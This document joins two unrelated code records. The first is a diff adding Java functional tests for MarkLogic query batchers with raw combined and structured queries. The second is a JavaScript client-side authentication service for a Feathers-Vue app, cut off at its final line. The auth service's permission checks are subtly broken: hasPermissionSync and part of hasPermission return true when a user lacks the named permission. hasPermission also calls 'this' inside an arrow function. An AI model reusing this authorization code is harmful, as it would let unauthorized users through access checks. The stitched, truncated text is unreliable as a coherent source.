dmManagerTmp.newQueryBatcher(valuequeyDef); //StringBuilder batchRangeResults = new StringBuilder(); List<String> batchValueResults = new ArrayList<String>(); StringBuilder batchvalueFailResults = new StringBuilder(); queryBatcher3.onUrisReady(batch-> { for (String str : batch.getItems()) { batchValueResults.add(str); } }); queryBatcher3.onQueryFailure(throwable-> { System.out.println("Exceptions thrown from callback onQueryFailure in testDifferentQueryTypes"); throwable.printStackTrace(); batchvalueFailResults.append("Test has Exceptions"); } ); jobTicket = dmManagerTmp.startJob(queryBatcher3); bJobFinished = queryBatcher3.awaitCompletion(3, TimeUnit.MINUTES); while(!queryBatcher3.isStopped()) { // do nothing. } if (queryBatcher3.isStopped()) { if (!batchvalueFailResults.toString().isEmpty() && batchvalueFailResults.toString().contains("Exceptions")) { fail("Test failed due to exceptions in testDifferentQueryTypes - Word Query"); } // Verify the batch results now. assertTrue("No of documents returned in range query not correct", batchValueResults.size() == 1); assertTrue("URI returned not correct", batchRangeResults.contains("/abs-range-constraint/batcher-contraints1.xml")); } } catch (Exception e) { System.out.println("Exceptions thrown from Test testDifferentQueryTypes"); System.out.println(e.getMessage()); } finally { // Associate back the original DB. associateRESTServerWithDB(restServerName, dbName); detachForest(testMultipleDB, testMultipleForest[0]); deleteDB(testMultipleDB); deleteForest(testMultipleForest[0]); clientTmp.release(); Thread.sleep(10000); } } }
New Tests for Git #590
test-complete/src/test/java/com/marklogic/client/datamovement/functionaltests/StringQueryHostBatcherTest.java
New Tests for Git #590
<ide><path>est-complete/src/test/java/com/marklogic/client/datamovement/functionaltests/StringQueryHostBatcherTest.java <ide> import static org.junit.Assert.assertTrue; <ide> import static org.junit.Assert.fail; <ide> <add>import java.io.BufferedReader; <ide> import java.io.File; <ide> import java.io.FileInputStream; <add>import java.io.FileNotFoundException; <add>import java.io.FileReader; <add>import java.io.FileWriter; <ide> import java.io.IOException; <ide> import java.util.ArrayList; <ide> import java.util.Calendar; <ide> import java.util.List; <add>import java.util.TreeMap; <ide> import java.util.concurrent.TimeUnit; <add>import java.util.logging.Handler; <add>import java.util.logging.Level; <add>import java.util.logging.LogRecord; <add>import java.util.logging.Logger; <ide> <ide> import javax.xml.namespace.QName; <ide> import javax.xml.parsers.ParserConfigurationException; <ide> import javax.xml.transform.TransformerException; <ide> import javax.xml.xpath.XPathExpressionException; <ide> <add>import org.apache.logging.log4j.core.jmx.AppenderAdmin; <ide> import org.junit.After; <ide> import org.junit.AfterClass; <ide> import org.junit.Before; <ide> import org.junit.BeforeClass; <ide> import org.junit.Ignore; <ide> import org.junit.Test; <add>import org.w3c.dom.Document; <ide> import org.xml.sax.SAXException; <ide> <ide> import com.fasterxml.jackson.databind.JsonNode; <ide> import com.marklogic.client.DatabaseClientFactory; <ide> import com.marklogic.client.DatabaseClientFactory.Authentication; <ide> import com.marklogic.client.admin.ExtensionMetadata; <add>import com.marklogic.client.admin.QueryOptionsManager; <ide> import com.marklogic.client.admin.ServerConfigurationManager; <ide> import com.marklogic.client.admin.TransformExtensionsManager; <ide> import com.marklogic.client.datamovement.DataMovementManager; <ide> import com.marklogic.client.datamovement.Forest; <ide> import com.marklogic.client.datamovement.JobTicket; <ide> import com.marklogic.client.datamovement.QueryBatcher; <add>import com.marklogic.client.datamovement.UrisToWriterListener; <ide> import com.marklogic.client.datamovement.WriteBatcher; <ide> import com.marklogic.client.datamovement.functionaltests.util.DmsdkJavaClientREST; <add>import com.marklogic.client.datamovement.impl.QueryBatcherImpl; <ide> import com.marklogic.client.document.JSONDocumentManager; <ide> import com.marklogic.client.document.ServerTransform; <ide> import com.marklogic.client.io.DOMHandle; <ide> import com.marklogic.client.io.Format; <ide> import com.marklogic.client.io.InputStreamHandle; <ide> import com.marklogic.client.io.JacksonHandle; <add>import com.marklogic.client.io.ReaderHandle; <ide> import com.marklogic.client.io.StringHandle; <ide> import com.marklogic.client.query.QueryManager; <ide> import com.marklogic.client.query.RawCombinedQueryDefinition; <add>import com.marklogic.client.query.RawStructuredQueryDefinition; <ide> import com.marklogic.client.query.StringQueryDefinition; <ide> import com.marklogic.client.query.StructuredQueryBuilder; <ide> import com.marklogic.client.query.StructuredQueryBuilder.Operator; <ide> // For use with QueryHostBatcher <ide> clientQHB = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <ide> moveMgr = clientQHB.newDataMovementManager(); <add> <ide> } <ide> <ide> /** <ide> assertEquals("Batch Number","0", res[3]); <ide> } <ide> }*/ <add> <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be mixed in with a StructuredQueryBuilder <add> * @throws Exception <add> * <add> * TODO modify this test for Git 591, once 591 is fixed/addressed. <add> * <add> */ <add> @Ignore <add> public void testRawStructuredQDWithQueryBuilder() throws Exception <add> { <add> String testMultipleDB = "RawStrutdQDWithQBuilderDB"; <add> String[] testMultipleForest = {"RawStrutdQDWithQBuilderDB-1", "RawStrutdQDWithQBuilderDB-2", "RawStrutdQDWithQBuilderDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> FileWriter writer = null; <add> BufferedReader UriReaderTxt = null; <add> FileReader freader = null; <add> String fileName = "RawStrutdQDWithQBuilderDB.txt"; <add> <add> try { <add> System.out.println("Running testRawStructuredQDWithQueryBuilder"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"curbappeal.xml", "flipper.xml", "justintime.xml"}; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> InputStreamHandle contentHandle3 = new InputStreamHandle(); <add> contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> wbatcher.add(filenames[2], contentHandle3); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> StructuredQueryBuilder qb = queryMgr.newStructuredQueryBuilder(); <add> String options = <add> "<options xmlns=\"http://marklogic.com/appservices/search\">" + <add> "<constraint name='industry'>"+ <add> "<value>"+ <add> "<element name='industry' ns=''/>"+ <add> "</value>"+ <add> "</constraint>"+ <add> "</options>"; <add> <add> RawStructuredQueryDefinition rsq = qb.build(qb.term("neighborhoods"), <add> qb.valueConstraint("industry", "Real Estate")); <add> String comboquery = "<search xmlns=\"http://marklogic.com/appservices/search\">" + <add> rsq.toString() + options + <add> "</search>"; <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition((new StringHandle(comboquery)).withFormat(Format.XML)); <add> <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. <add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> queryBatcher1.withBatchSize(1); <add> writer = new FileWriter(fileName); <add> <add> queryBatcher1.onUrisReady(new UrisToWriterListener(writer)) <add> .onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> writer.flush(); <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> freader = new FileReader(fileName); <add> UriReaderTxt = new BufferedReader(freader); <add> TreeMap<String, String> expectedMap = new TreeMap<String, String>(); <add> TreeMap<String, String> uriMap = new TreeMap<String, String>(); <add> expectedMap.put(filenames[0], "URI"); <add> expectedMap.put(filenames[1], "URI"); <add> String line = null; <add> <add> while ((line = UriReaderTxt.readLine()) != null) { <add> System.out.println("Line read from file with URIS is" + line); <add> uriMap.put(line, "URI"); <add> } <add> assertTrue("URIs not read correctly from testRawStructuredQDWithQueryBuilder method ", expectedMap.equals(uriMap)); <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from Test testRawStructuredQDWithQueryBuilder"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> try { <add> if (writer != null) <add> writer.close(); <add> if (UriReaderTxt != null) <add> UriReaderTxt.close(); <add> if (freader != null) freader.close(); <add> // Delete the file on JVM exit <add> File file = new File(fileName); <add> file.deleteOnExit(); <add> } catch (Exception e) { <add> // TODO Auto-generated catch block <add> e.printStackTrace(); <add> } <add> <add> clientTmp.release(); <add> } <add> } <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be used withQueryBatcher <add> * Store options from a file to server. <add> * Read a query from a file into a handle <add> * Create a RawCombinedQueryDefinition from handle and options, to be used in QueryBatcher Job. <add> * <add> * @throws Exception <add> * <add> */ <add> @Test <add> public void testRawCombinedQueryXMLWithWriteOptions() throws Exception <add> { <add> String testMultipleDB = "RawCombinedQueryXMLDB"; <add> String[] testMultipleForest = {"RawCombinedQueryXMLDB-1", "RawCombinedQueryXMLDB-2", "RawCombinedQueryXMLDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> <add> try { <add> System.out.println("Running testRawCombinedQueryXMLWithWriteOptions"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; <add> String queryOptionFileName = "valueConstraintWithoutIndexSettingsAndNSOpt.xml"; <add> <add> String queryName = "combinedQueryNoOption.xml"; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> String combQueryFileDir = dataConfigDirPath + "/combined/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> InputStreamHandle contentHandle3 = new InputStreamHandle(); <add> contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); <add> InputStreamHandle contentHandle4 = new InputStreamHandle(); <add> contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); <add> InputStreamHandle contentHandle5 = new InputStreamHandle(); <add> contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> wbatcher.add(filenames[2], contentHandle3); <add> wbatcher.add(filenames[3], contentHandle4); <add> wbatcher.add(filenames[4], contentHandle5); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> setQueryOption(clientTmp, queryOptionFileName); <add> // get the combined query <add> File file = new File(combQueryFileDir+queryName); <add> <add> // create a handle for the search criteria <add> FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.XML); <add> // create a search definition based on the handle <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle, queryOptionFileName); <add> <add> StringBuilder batchResults = new StringBuilder(); <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. <add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> <add> queryBatcher1.onUrisReady(batch-> { <add> for (String str : batch.getItems()) { <add> batchResults.append(str) <add> .append('|'); <add> } <add> }); <add> queryBatcher1.onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> <add> if (queryBatcher1.isStopped()) { <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> String[] res = batchResults.toString().split("\\|"); <add> assertEquals("Number of reults returned is incorrect", 1, res.length); <add> assertTrue("URI returned not correct", res[0].contains(filenames[4])); <add> <add> // Read the document and assert on the value <add> DOMHandle contentHandle = new DOMHandle(); <add> contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); <add> Document readDoc = contentHandle.get(); <add> System.out.println(convertXMLDocumentToString(readDoc)); <add> <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); <add> } <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from testRawCombinedQueryXMLWithWriteOptions"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> clientTmp.release(); <add> } <add> } <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be used withQueryBatcher - JSON file <add> * Read a query from a combined file into a handle. combinedQueryOptionJSON.json contains query, options in JSON format. <add> * @throws Exception <add> * <add> */ <add> @Test <add> public void testRawCombinedQueryJSON() throws Exception <add> { <add> String testMultipleDB = "RawCombinedRangeJsonDB"; <add> String[] testMultipleForest = {"RawCombinedRangeJsonDB-1", "RawCombinedRangeJsonDB-2", "RawCombinedRangeJsonDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> <add> try { <add> System.out.println("Running testRawCombinedQueryJSON"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"constraint1.xml", "constraint2.xml", "constraint3.xml", "constraint4.xml", "constraint5.xml"}; <add> String combinedQueryFileName = "combinedQueryOptionJSON.json"; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> String combQueryFileDir = dataConfigDirPath + "/combined/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> InputStreamHandle contentHandle3 = new InputStreamHandle(); <add> contentHandle3.set(new FileInputStream(dataFileDir + filenames[2])); <add> InputStreamHandle contentHandle4 = new InputStreamHandle(); <add> contentHandle4.set(new FileInputStream(dataFileDir + filenames[3])); <add> InputStreamHandle contentHandle5 = new InputStreamHandle(); <add> contentHandle5.set(new FileInputStream(dataFileDir + filenames[4])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> wbatcher.add(filenames[2], contentHandle3); <add> wbatcher.add(filenames[3], contentHandle4); <add> wbatcher.add(filenames[4], contentHandle5); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> // get the combined query <add> File file = new File(combQueryFileDir+combinedQueryFileName); <add> <add> // create a handle for the search criteria <add> FileHandle rawHandle = (new FileHandle(file)).withFormat(Format.JSON); <add> // create a search definition based on the handle <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); <add> <add> StringBuilder batchResults = new StringBuilder(); <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. <add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> <add> queryBatcher1.onUrisReady(batch-> { <add> for (String str : batch.getItems()) { <add> batchResults.append(str) <add> .append('|'); <add> } <add> }); <add> queryBatcher1.onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> <add> if (queryBatcher1.isStopped()) { <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> String[] res = batchResults.toString().split("\\|"); <add> assertEquals("Number of reults returned is incorrect", 1, res.length); <add> assertTrue("URI returned not correct", res[0].contains(filenames[4])); <add> <add> // Read the document and assert on the value <add> DOMHandle contentHandle = new DOMHandle(); <add> contentHandle = readDocumentUsingDOMHandle(clientTmp, filenames[4], "XML"); <add> Document readDoc = contentHandle.get(); <add> System.out.println(convertXMLDocumentToString(readDoc)); <add> <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("id").item(0).getTextContent().contains("0026")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("title").item(0).getTextContent().contains("The memex")); <add> assertTrue("Document content returned not correct", readDoc.getElementsByTagName("date").item(0).getTextContent().contains("2009-05-05")); <add> } <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from testRawCombinedQueryJSONWithWriteOptions"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> clientTmp.release(); <add> } <add> } <add> <add> /* <add> * To test that RawStructuredQueryDefinition can be used withQueryBatcher - Combined file <add> * Read a query from a combined file into a handle. <add> * Create a RawCombinedQueryDefinition from handle, to be used in QueryBatcher Job. <add> * <add> * @throws Exception <add> * <add> */ <add> @Test <add> public void testRawCombinedQueryPathIndex() throws Exception <add> { <add> String testMultipleDB = "RawCombinedRangePathDB"; <add> String[] testMultipleForest = {"RawCombinedRangePathDB-1", "RawCombinedRangePathDB-2", "RawCombinedRangePathDB-3"}; <add> DatabaseClient clientTmp = null; <add> DataMovementManager dmManagerTmp = null; <add> <add> try { <add> System.out.println("Running testRawCombinedQueryPathIndex"); <add> <add> //Setup a separate database/ <add> createDB(testMultipleDB); <add> createForest(testMultipleForest[0], testMultipleDB); <add> createForest(testMultipleForest[1], testMultipleDB); <add> associateRESTServerWithDB(restServerName, testMultipleDB); <add> setupAppServicesConstraint(testMultipleDB); <add> Thread.sleep(10000); <add> <add> String[] filenames = {"pathindex1.xml", "pathindex2.xml"}; <add> String combinedQueryFileName = "combinedQueryOptionPathIndex.xml"; <add> <add> clientTmp = DatabaseClientFactory.newClient(restServerHost, restServerPort, "eval-user", "x", Authentication.DIGEST); <add> dmManagerTmp = clientTmp.newDataMovementManager(); <add> <add> QueryManager queryMgr = clientTmp.newQueryManager(); <add> String dataFileDir = dataConfigDirPath + "/data/"; <add> String combQueryFileDir = dataConfigDirPath + "/combined/"; <add> <add> //Use WriteBatcher to write the same files. <add> WriteBatcher wbatcher = dmManagerTmp.newWriteBatcher(); <add> <add> wbatcher.withBatchSize(2); <add> InputStreamHandle contentHandle1 = new InputStreamHandle(); <add> contentHandle1.set(new FileInputStream(dataFileDir + filenames[0])); <add> InputStreamHandle contentHandle2 = new InputStreamHandle(); <add> contentHandle2.set(new FileInputStream(dataFileDir + filenames[1])); <add> <add> wbatcher.add(filenames[0], contentHandle1); <add> wbatcher.add(filenames[1], contentHandle2); <add> <add> // Verify if the batch flushes when batch size is reached. <add> // Flush <add> <add> wbatcher.flushAndWait(); <add> wbatcher.awaitCompletion(); <add> <add> // get the combined query <add> File file = new File(combQueryFileDir+combinedQueryFileName); <add> <add> // create a handle for the search criteria <add> FileHandle rawHandle = new FileHandle(file); <add> rawHandle.withFormat(Format.XML); <add> // create a search definition based on the handle <add> RawCombinedQueryDefinition querydef = queryMgr.newRawCombinedQueryDefinition(rawHandle); <add> <add> StringBuilder batchResults = new StringBuilder(); <add> StringBuilder batchFailResults = new StringBuilder(); <add> <add> // Run a QueryBatcher on the new URIs. <add> QueryBatcher queryBatcher1 = dmManagerTmp.newQueryBatcher(querydef); <add> <add> queryBatcher1.onUrisReady(batch-> { <add> for (String str : batch.getItems()) { <add> batchResults.append(str) <add> .append('|'); <add> } <add> }); <add> queryBatcher1.onQueryFailure(throwable-> { <add> System.out.println("Exceptions thrown from callback onQueryFailure"); <add> throwable.printStackTrace(); <add> batchFailResults.append("Test has Exceptions"); <add> } ); <add> <add> JobTicket jobTicket = dmManagerTmp.startJob(queryBatcher1); <add> boolean bJobFinished = queryBatcher1.awaitCompletion(3, TimeUnit.MINUTES); <add> <add> if (queryBatcher1.isStopped()) { <add> <add> if (!batchFailResults.toString().isEmpty() && batchFailResults.toString().contains("Exceptions")) { <add> fail("Test failed due to exceptions"); <add> } <add> <add> // Verify the batch results now. <add> String[] res = batchResults.toString().split("\\|"); <add> assertEquals("Number of reults returned is incorrect", 2, res.length); <add> assertTrue("URI returned not correct", res[0].contains("pathindex1.xml")?true:(res[1].contains("pathindex1.xml")?true:false)); <add> assertTrue("URI returned not correct", res[0].contains("pathindex2.xml")?true:(res[1].contains("pathindex2.xml")?true:false)); <add> } <add> } <add> catch (Exception e) { <add> System.out.println("Exceptions thrown from testRawCombinedQueryPathIndex"); <add> System.out.println(e.getMessage()); <add> } <add> finally { <add> // Associate back the original DB. <add> associateRESTServerWithDB(restServerName, dbName); <add> detachForest(testMultipleDB, testMultipleForest[0]); <add> detachForest(testMultipleDB, testMultipleForest[1]); <add> deleteDB(testMultipleDB); <add> <add> deleteForest(testMultipleForest[0]); <add> deleteForest(testMultipleForest[1]); <add> Thread.sleep(10000); <add> clientTmp.release(); <add> } <add> } <ide> <ide> /* <ide> * To test query by example with WriteBatcher and QueryBatcher <ide> } <ide> <ide> } <add> <ide> <ide> /* <ide> * To test query by example with WriteBatcher and QueryBatcher <ide> while(!queryBatcher1.isStopped()) { <ide> // do nothing. <ide> } <del> <ide> if (queryBatcher1.isStopped()) { <ide> <ide> if (!batchWordFailResults.toString().isEmpty() && batchWordFailResults.toString().contains("Exceptions")) {
JavaScript
mit
7ce00e43d3709936b2c77129bb1f08f87edc33e2
0
codingfriend1/Feathers-Vue,codingfriend1/Feathers-Vue
/** * Dream Code Auth Service * * Client-Side Authentication and Authorization Service * * Creates a global `auth` constant * Methods * * - __authenticate({ email, password }) - internal method * * - login({ email, password }) * * - logout() * * - signup({ email, name, password }) * * - changePassword({ oldPassword, newPassword }) * * - changeMyIdentity( password, { email, name }) - Must be logged in * * - verifySignUp( verifyToken ) * * - verifyChanges( verifyToken ) * * - resendVerification( email ) * * - sendResetPassword( email ) * * - resetPassword( email ) * * - getToken() * * - isLoggedIn() * * - hasPermission( permissionName ) - * Checks user permissions against a single permission string * but waits for login request to finish * * - hasPermissionSync( permissionName ) * * Properties * - currentUser - Contains the current user definition */ const auth = { currentUser: null, __authenticate: user => { user = user ? Object.assign(user, { strategy: 'local' }): undefined return feathers.authenticate( user ) .then(response => { if(window.location.hostname.indexOf('localhost') > -1) { notify.log('Access Token: ', response.accessToken) notify.log('User: ', response.user) } feathers.set('user', response.user) auth.currentUser = feathers.get('user') return auth.currentUser }) }, login: async user => { auth.logout() var [err, foundUser] = await to( auth.__authenticate(user) ) if(!err) { notify.success(`Hello ${foundUser.name || foundUser.email}`) return auth.currentUser } else { notify.warning(err.message) notify.debug('Error authenticating', err) auth.logout() return false } }, logout: async user => { feathers.logout() feathers.set('user', null) auth.currentUser = null }, signup: async user => { if(!user) { notify.error('Please fill out the user information') return false } auth.logout() let [err, result] = await api.users.create(user) if(!err) { let options = { type: 'local', email: user.email, password: user.password } let [authFail, currentUser] = await to( auth.__authenticate(user) ) if(!authFail) { notify.success(`Hello ${currentUser.name || currentUser.email}. Please check your email and verify so we can protect your account.`) return auth.currentUser } else { notify.error(parseErrors(authFail), 'Error signing up') return false } } else { if(err.code === 409) { notify.error('That email is already taken.') } else { notify.error(parseErrors(err)) } return false } }, changePassword: async function(oldPassword, password) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to change your password.') return false } let options = { action: 'passwordChange', value: { user: { email: auth.currentUser.email }, oldPassword, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your current password has been changed. Next time you log in please use the new password.') } else { notify.error(err.message) } }, changeMyIdentity: async function(password, changes) { if(!_.get(auth, 'currentUser.email')) { notify.warning('You must be logged in to update your account.') return false } if(!password) { notify.warning('You must provide a password to update your account.') return false } if(!changes) { notify.warning('Please provide information to update your account with.') return false } let options = { action: 'identityChange', value: { password, changes, user: { email: auth.currentUser.email } } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('The changes are pending. Please check your email to verify that you made the change.') } else { notify.error(err.message) } }, verifySignUp: async function verifySignUp(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('Your email has been verified. We can now protect your account.') } else { notify.error('Sorry, but we could not verify your email.') notify.debug("Verify Email Error: ", err) } return response }, verifyChanges: async function verifyChanges(slug) { if(!slug) { return false } let [err, response] = await api.authManagement.create({ action: 'verifySignupLong', value: slug }) if(!err) { notify.success('You have approved the changes to your account. You may now sign in under the new email.') } else { notify.error('Sorry, but we could not approved the changes to your account.') notify.debug("Verify Changes Error: ", err) } }, resendVerification: async function resendVerification(email) { if(_.get(auth, 'currentUser.isVerified')) { return notify.success("This account has already been verified") } if(!email) { notify.success('Please fill out your email to verify.') return false } let options = { action: 'resendVerifySignup', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Another verification email has been sent.') } else { notify.error('Sorry but we could not send a verification email.') } }, sendResetPassword: async function sendResetPassword(email) { if(!email) { notify.warning('Please provide your email so we can send you a reset password email.') return false } let options = { action: 'sendResetPwd', value: { email } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Please check your email. A link to reset your password has been sent.') } else { notify.warning(err.message) notify.debug('Error sending reset password email', err) } }, resetPassword: async function saveResetPassword(slug, password) { let options = { action: 'resetPwdLong', value: { token: slug, password } } let [err, result] = await api.authManagement.create(options) if(!err) { notify.success('Your password was updated. You may now sign in under the new password.') return true } else { notify.warning('Sorry but there was an error updating your password.') } }, getToken: () => feathers.get('token'), isLoggedIn: () => { return auth.__authenticate().then(response => { auth.currentUser = feathers.get('user') return auth.currentUser }, err => { notify.debug("Currently not logged in") }) }, hasPermission: permissionName => { let privs = _.get(auth, 'currentUser.permissions') if(!privs) { return this.isLoggedIn().then(isLoggedIn => { if(!isLoggedIn) { return false } auth.currentUser = feathers.get('user') let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') }, err => { return false }) } else { if(privs.includes(permissionName) || _.get(auth, 'currentUser.role') === 'admin') { return true } else { return false } } }, hasPermissionSync: permissionName => { let privs = _.get(auth, 'currentUser.permissions') return !privs || (!privs.includes(permissionName) && _.get(auth, 'currentUser.role') !== 'admin') } } try { global.auth = 